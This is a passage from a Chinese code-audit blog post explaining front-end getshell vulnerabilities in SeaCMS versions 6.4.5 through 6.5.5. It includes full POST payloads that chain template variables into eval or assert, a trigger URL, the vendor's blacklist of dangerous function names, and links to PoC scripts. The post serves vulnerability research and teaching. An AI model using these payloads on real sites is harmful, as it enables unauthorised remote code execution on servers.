<p>这个正则式并不是贪婪匹配，而是使用  <strong>？</strong> 来取消了贪婪匹配。每次只匹配一个结果，并不向后延伸，而匹配到所有结果是函数 <strong>preg_match_all()</strong> 的作用。</p>
<h4 id="1-2-结果分析"><a href="#1-2-结果分析" class="headerlink" title="1.2 结果分析"></a>1.2 结果分析</h4><p>这个漏洞利用的十分巧妙。先利用可控变量替换模板中的内容，然后进行模板内容提取，最后正则匹配执行代码。但是说到底，挖掘漏洞的人肯定也是从 eval() 这个危险函数出发，逐步回退，找到可控参数，然后一步步的构造payload，这是典型的一个白盒挖掘漏洞的思路，<code>回溯参数</code>的方法。</p>
<p>但是 php7 版本以上此漏洞却不能利用，原因是之前匹配到的 <code>&quot;</code> 使得 eval() 函数不能正确执行，导致后面的代码停止执行。</p>
<p>测试代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>$test = <span class="hljs-keyword">array</span>(<span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>,<span class="hljs-string">'"'</span>,<span class="hljs-string">"1)phpinfo();if(1"</span>);<br><span class="hljs-keyword">for</span> ($i=<span class="hljs-number">0</span>;$i&lt;<span class="hljs-number">5</span>;$i++)&#123;<br>    @<span class="hljs-keyword">eval</span>(<span class="hljs-string">"if("</span>.$test[$i].<span class="hljs-string">") &#123; \$ifFlag=true;&#125; else&#123; \$ifFlag=false;&#125;"</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>php5 下的执行结果</p>
<p>  <img    class="lazyload" data-original="https://raw.githubusercontent.com/59lx/userful_photo/master/myblog_photos/seacms_getshell/4.png"  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="    alt></p>
<p>php7 下的执行结果</p>
<p> <img    class="lazyload" data-original="https://raw.githubusercontent.com/59lx/userful_photo/master/myblog_photos/seacms_getshell/5.png"  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="    alt></p>
<p>可以看出，单从 eval() 函数的使用上来说，php7 对于语法的正确性要求更加严格。</p>
<h3 id="2、v-6-5-4-前台-getshell"><a href="#2、v-6-5-4-前台-getshell" class="headerlink" title="2、v_6.5.4 前台 getshell"></a>2、v_6.5.4 前台 getshell</h3><p>在这个版本的代码中，将上面讲到的 <strong>$order</strong> 变量也进行了特殊字符的检测 </p>
<p> <img    class="lazyload" data-original="https://raw.githubusercontent.com/59lx/userful_photo/master/myblog_photos/seacms_getshell/6.png"  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="    alt="6"></p>
<p>跟进到 RemoveXSS 函数里面，可以看出是一个基于黑名单的 xss 关键字过滤的方法。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">RemoveXSS</span><span class="hljs-params">($val)</span> </span>&#123;  <br><br>   $val = preg_replace(<span class="hljs-string">'/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/'</span>, <span class="hljs-string">''</span>, $val);  <br>  <br>   $search = <span class="hljs-string">'abcdefghijklmnopqrstuvwxyz'</span>; <br>   $search .= <span class="hljs-string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span>;  <br>   $search .= <span class="hljs-string">'1234567890!@#$%^&amp;*()'</span>; <br>   $search .= <span class="hljs-string">'~`";:?+/=&#123;&#125;[]-_|\'\\'</span>; <br>   <span class="hljs-keyword">for</span> ($i = <span class="hljs-number">0</span>; $i &lt; strlen($search); $i++) &#123; <br> <br>      $val = preg_replace(<span class="hljs-string">'/(&amp;#[xX]0&#123;0,8&#125;'</span>.dechex(ord($search[$i])).<span class="hljs-string">';?)/i'</span>, $search[$i], $val); <br>      $val = preg_replace(<span class="hljs-string">'/(&amp;#0&#123;0,8&#125;'</span>.ord($search[$i]).<span class="hljs-string">';?)/'</span>, $search[$i], $val); <span class="hljs-comment">// with a ; </span><br>   &#125; <br>   <br>   $ra1 = <span class="hljs-keyword">Array</span>(<span class="hljs-string">'_GET'</span>,<span class="hljs-string">'_POST'</span>,<span class="hljs-string">'_COOKIE'</span>,<span class="hljs-string">'_REQUEST'</span>,<span class="hljs-string">'if:'</span>,<span class="hljs-string">'javascript'</span>, <span class="hljs-string">'vbscript'</span>, <span class="hljs-string">'expression'</span>, <span class="hljs-string">'applet'</span>, <span class="hljs-string">'meta'</span>, <span class="hljs-string">'xml'</span>, <span class="hljs-string">'blink'</span>, <span class="hljs-string">'link'</span>, <span class="hljs-string">'style'</span>, <span class="hljs-string">'script'</span>, <span class="hljs-string">'embed'</span>, <span class="hljs-string">'object'</span>, <span class="hljs-string">'iframe'</span>, <span class="hljs-string">'frame'</span>, <span class="hljs-string">'frameset'</span>, <span class="hljs-string">'ilayer'</span>, <span class="hljs-string">'layer'</span>, <span class="hljs-string">'bgsound'</span>, <span class="hljs-string">'title'</span>, <span class="hljs-string">'base'</span>, <span class="hljs-string">'eval'</span>, <span class="hljs-string">'passthru'</span>, <span class="hljs-string">'exec'</span>, <span class="hljs-string">'assert'</span>, <span class="hljs-string">'system'</span>, <span class="hljs-string">'chroot'</span>, <span class="hljs-string">'chgrp'</span>, <span class="hljs-string">'chown'</span>, <span class="hljs-string">'shell_exec'</span>, <span class="hljs-string">'proc_open'</span>, <span class="hljs-string">'ini_restore'</span>, <span class="hljs-string">'dl'</span>, <span class="hljs-string">'readlink'</span>, <span class="hljs-string">'symlink'</span>, <span class="hljs-string">'popen'</span>, <span class="hljs-string">'stream_socket_server'</span>, <span class="hljs-string">'pfsockopen'</span>, <span class="hljs-string">'putenv'</span>, <span class="hljs-string">'cmd'</span>,<span class="hljs-string">'base64_decode'</span>,<span class="hljs-string">'fopen'</span>,<span class="hljs-string">'fputs'</span>,<span class="hljs-string">'replace'</span>,<span class="hljs-string">'input'</span>,<span class="hljs-string">'contents'</span>); <br>   $ra2 = <span class="hljs-keyword">Array</span>(<span class="hljs-string">'onabort'</span>, <span class="hljs-string">'onactivate'</span>, <span class="hljs-string">'onafterprint'</span>, <span class="hljs-string">'onafterupdate'</span>, <span class="hljs-string">'onbeforeactivate'</span>, <span class="hljs-string">'onbeforecopy'</span>, <span class="hljs-string">'onbeforecut'</span>, <span class="hljs-string">'onbeforedeactivate'</span>, <span class="hljs-string">'onbeforeeditfocus'</span>, <span class="hljs-string">'onbeforepaste'</span>, <span class="hljs-string">'onbeforeprint'</span>, <span class="hljs-string">'onbeforeunload'</span>, <span class="hljs-string">'onbeforeupdate'</span>, <span class="hljs-string">'onblur'</span>, <span class="hljs-string">'onbounce'</span>, <span class="hljs-string">'oncellchange'</span>, <span class="hljs-string">'onchange'</span>, <span class="hljs-string">'onclick'</span>, <span class="hljs-string">'oncontextmenu'</span>, <span class="hljs-string">'oncontrolselect'</span>, <span class="hljs-string">'oncopy'</span>, <span class="hljs-string">'oncut'</span>, <span class="hljs-string">'ondataavailable'</span>, <span class="hljs-string">'ondatasetchanged'</span>, <span class="hljs-string">'ondatasetcomplete'</span>, <span class="hljs-string">'ondblclick'</span>, <span class="hljs-string">'ondeactivate'</span>, <span class="hljs-string">'ondrag'</span>, <span class="hljs-string">'ondragend'</span>, <span class="hljs-string">'ondragenter'</span>, <span class="hljs-string">'ondragleave'</span>, <span class="hljs-string">'ondragover'</span>, <span class="hljs-string">'ondragstart'</span>, <span class="hljs-string">'ondrop'</span>, <span class="hljs-string">'onerror'</span>, <span class="hljs-string">'onerrorupdate'</span>, <span class="hljs-string">'onfilterchange'</span>, <span class="hljs-string">'onfinish'</span>, <span class="hljs-string">'onfocus'</span>, <span class="hljs-string">'onfocusin'</span>, <span class="hljs-string">'onfocusout'</span>, <span class="hljs-string">'onhelp'</span>, <span class="hljs-string">'onkeydown'</span>, <span class="hljs-string">'onkeypress'</span>, <span class="hljs-string">'onkeyup'</span>, <span class="hljs-string">'onlayoutcomplete'</span>, <span class="hljs-string">'onload'</span>, <span class="hljs-string">'onlosecapture'</span>, <span class="hljs-string">'onmousedown'</span>, <span class="hljs-string">'onmouseenter'</span>, <span class="hljs-string">'onmouseleave'</span>, <span class="hljs-string">'onmousemove'</span>, <span class="hljs-string">'onmouseout'</span>, <span class="hljs-string">'onmouseover'</span>, <span class="hljs-string">'onmouseup'</span>, <span class="hljs-string">'onmousewheel'</span>, <span class="hljs-string">'onmove'</span>, <span class="hljs-string">'onmoveend'</span>, <span class="hljs-string">'onmovestart'</span>, <span class="hljs-string">'onpaste'</span>, <span class="hljs-string">'onpropertychange'</span>, <span class="hljs-string">'onreadystatechange'</span>, <span class="hljs-string">'onreset'</span>, <span class="hljs-string">'onresize'</span>, <span class="hljs-string">'onresizeend'</span>, <span class="hljs-string">'onresizestart'</span>, <span class="hljs-string">'onrowenter'</span>, <span class="hljs-string">'onrowexit'</span>, <span class="hljs-string">'onrowsdelete'</span>, <span class="hljs-string">'onrowsinserted'</span>, <span class="hljs-string">'onscroll'</span>, <span class="hljs-string">'onselect'</span>, <span class="hljs-string">'onselectionchange'</span>, <span class="hljs-string">'onselectstart'</span>, <span class="hljs-string">'onstart'</span>, <span class="hljs-string">'onstop'</span>, <span class="hljs-string">'onsubmit'</span>, <span class="hljs-string">'onunload'</span>); <br>   $ra = array_merge($ra1, $ra2); <br><br>    ......<br>    <br>   <span class="hljs-keyword">return</span> $val;  <br>&#125;<br></code></pre></td></tr></table></figure>

<p>其中，黑名单数组的第一组 $ra1 中的第5项添加了 <code>if:</code> 这个黑名单匹配项，还加了另外其他的几个匹配项</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs undefined">'_GET','_POST','_COOKIE','_REQUEST'<br></code></pre></td></tr></table></figure>

<p>所以 v_6.4.5 版本的 payload 会因为逻辑关系的不成立，因此在 eval() 函数中得不到执行。</p>
<p>那么我们来看看这个版本的脑洞版 payload </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php">文件：<br>search.php<br><br>POST 内容：<br>searchtype=<span class="hljs-number">5</span><br>&amp;searchword=&#123;<span class="hljs-keyword">if</span>&#123;searchpage:year&#125;<br>&amp;year=:e&#123;searchpage:area&#125;&#125;<br>&amp;area=v&#123;searchpage:letter&#125;<br>&amp;letter=al&#123;searchpage:lang&#125;<br>&amp;yuyan=(join&#123;searchpage:jq&#125;<br>&amp;jq=($_P&#123;searchpage:ver&#125;<br>&amp;ver=OST[<span class="hljs-number">9</span>]))<br>&amp;<span class="hljs-number">9</span>[]=ph<br>&amp;<span class="hljs-number">9</span>[]=pinfo();<br><br><span class="hljs-comment">// 传递拼接为 ：if:eval(join($_POST[9]))</span><br></code></pre></td></tr></table></figure>

<p>因为每个传入的参数限长为 20，所以我们必须尽可能多的使用之后会在模板文件中进行替换的变量进行 payload 的构造。</p>
<p>每一步都会将上一步构造的 payload 进行二次构造，最后传递成为最终等待执行的代码:</p>
<figure class="highlight PHP"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-keyword">if</span>:<span class="hljs-keyword">eval</span>(join($_POST[<span class="hljs-number">9</span>]))<br></code></pre></td></tr></table></figure>

<p>由上一个版本的数据流向，依旧会通过 <strong>parseIf()</strong> 函数，那么最终 eval() 执行恶意函数。这里有两个疑点需要解释。</p>
<ul>
<li><p>为了防止在 <strong>parseIf</strong> 里面的 eval() 中的 if 语句逻辑错误而不能正常执行，这里构造了 eval(eval(【】)）的结构，使得因为解析顺序，<strong>$_POST</strong> 传来的值会直接进行解释执行。</p>
</li>
<li><p>这里只执行了一次 phpinfo() 函数就是第一次替换执行的，第一次的完整的正则匹配如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;<span class="hljs-keyword">if</span>:<span class="hljs-keyword">eval</span>(join($_POST[<span class="hljs-number">9</span>]))&#125;,海洋CMS<span class="hljs-string">" /&gt;<br>&lt;meta name="</span>description<span class="hljs-string">" content="</span>&#123;<span class="hljs-keyword">if</span>:<span class="hljs-keyword">eval</span>(join($_POST[<span class="hljs-number">9</span>]))&#125;,海洋CMS<span class="hljs-string">" /&gt;<br>&lt;meta http-equiv="</span>Content-Type<span class="hljs-string">" content="</span>text/html; charset=utf<span class="hljs-number">-8</span><span class="hljs-string">"&gt;<br>//省略大部分内容<br>&#123;end if&#125;</span><br></code></pre></td></tr></table></figure>

<p>由正则匹配和 eval() 函数执行的语句知，最后的执行语句为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">@<span class="hljs-keyword">eval</span>(<span class="hljs-string">"if("</span><span class="hljs-keyword">eval</span>(join($_POST[<span class="hljs-number">9</span>]))<span class="hljs-string">")&#123;\$ifFlag=true;&#125;else&#123;\$ifFlag=false;&#125;"</span>);<br></code></pre></td></tr></table></figure>

</li>
</ul>
<h4 id="￥思路分析"><a href="#￥思路分析" class="headerlink" title="￥思路分析"></a>￥思路分析</h4><p>如果我们在首次拿到这个系统的代码时，想要找到上面这种利用方式是不太容易的。整个利用思路最最值得借鉴的就是按照 php 的解析顺序，替换顺序来构造 payload ，让多次替换后的 payload 成为最终的 payload。的确骚~</p>
<h3 id="3、v6-5-5-前台-getshell"><a href="#3、v6-5-5-前台-getshell" class="headerlink" title="3、v6.5.5 前台 getshell"></a>3、v6.5.5 前台 getshell</h3><p>这一版的系统在 parseIf 函数里面进行了危险函数,参数的过滤，但是忽略了 assert 和 $SERVER[‘QUERY_STRING’]。构造方法同上一版，payload 如下。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php">文件：<br>search.php<br><br>POST 内容：<br>searchtype=<span class="hljs-number">5</span><br>&amp;searchword=&#123;<span class="hljs-keyword">if</span>&#123;searchpage:year&#125;<br>&amp;year=:<span class="hljs-keyword">as</span>&#123;searchpage:area&#125;&#125;<br>&amp;area=s&#123;searchpage:letter&#125;<br>&amp;letter=ert&#123;searchpage:lang&#125;<br>&amp;yuyan=($_SE&#123;searchpage:jq&#125;<br>&amp;jq=RVER&#123;searchpage:ver&#125;<br>&amp;ver=[QUERY_STRING]));<br></code></pre></td></tr></table></figure>

<p>访问如下的 url 即可触发</p>
<p><code>http://IP/search.php?phpinfo</code></p>
<p>post 内容如上。</p>
<h2 id="3-总结"><a href="#3-总结" class="headerlink" title="3@ 总结"></a>3@ 总结</h2><p>可以看见，这款 cms 的修复方法多次使用了黑名单，单独应用在这种场景下还是不容易做出良好的防御。</p>
<p>poc 脚本链接如下：</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs undefined">v_6.<span class="hljs-number">4.5</span>: http<span class="hljs-variable">s:</span>//github.<span class="hljs-keyword">com</span>/<span class="hljs-number">59</span>lx/auidt_poc/blob/master/seacms_poc_6.<span class="hljs-number">45</span>_getshell.<span class="hljs-keyword">py</span><br>v_6.<span class="hljs-number">5.4</span>: http<span class="hljs-variable">s:</span>//github.<span class="hljs-keyword">com</span>/<span class="hljs-number">59</span>lx/auidt_poc/blob/master/seacms_poc_6.<span class="hljs-number">5</span>_getshell.<span class="hljs-keyword">py</span><br>v_6.<span class="hljs-number">5.5</span>: http<span class="hljs-variable">s:</span>//github.<span class="hljs-keyword">com</span>/<span class="hljs-number">59</span>lx/auidt_poc/blob/master/seacms_poc_6.<span class="hljs-number">5</span>_getshell.<span class="hljs-keyword">py</span><br></code></pre></td></tr></table></figure>


    </section>
    <section class="extra">
      
        <section class="donate">
  <div class="qrcode">
    <img      class="lazyload" data-original="/image/95.jpg"  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  class="lazyload" data-original="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="    >
  </div>
  <div class="icon">
    <a href="javascript:;" id="alipay"><i class="iconfont iconalipay"></i></a>
    <a href="javascript:;" id="wechat"><i class="iconfont iconwechat-fill"></i></a>
  </div>
</section>
      
      
  <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/代码审计/">代码审计</a></li></ul>

      
<nav class="nav">
  
    <a href="/2019/08/17/ntfs系统中的ADS供选数据流/"><i class="iconfont iconleft"></i>ntfs 文件系统中的供选数据流</a>
  
  
</nav>

    </section>
    
  </section>
</article>
  </div>
</main>
  <footer class="footer">
  <div class="footer-social">
    
    
    
    
    
    <a href="https://weibo.com/u/6479214985 " target="_blank" onMouseOver="this.style.color= '#09BB07'"
      onMouseOut="this.style.color='#33333D'">
      <i class="iconfont footer-social-item  iconweibo "></i>
    </a>
    
    
    
    
    
    <a href="https://twitter.com/rt9518 " target="_blank" onMouseOver="this.style.color= '#DA2E76'"
      onMouseOut="this.style.color='#33333D'">
      <i class="iconfont footer-social-item  icontwitter "></i>
    </a>
    
    
    
    
    
    <a href="https://github.com/59lx " target="_blank" onMouseOver="this.style.color= '#24292E'"
      onMouseOut="this.style.color='#33333D'">
      <i class="iconfont footer-social-item  icongithub-fill "></i>
    </a>
    
  </div>
  <div class="footer-copyright"><p>Copyright© 2019-2020 | <a target="_blank" href="https://www.izhaoo.com">zhaoo</a> .AllRightsReserved</p></div>
</footer>
    <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  <div class="fab fab-menu">
    <i class="iconfont iconmenu"></i>
  </div>
</body>

<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>




<script src="https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.js"></script>






<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




<script src="https://cdn.bootcdn.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js"></script>




<script src="/js/script.js"></script>


<link href="https://cdn.bootcdn.net/ajax/libs/twitter-bootstrap/4.4.1/css/bootstrap-grid.css" rel="stylesheet">

</html>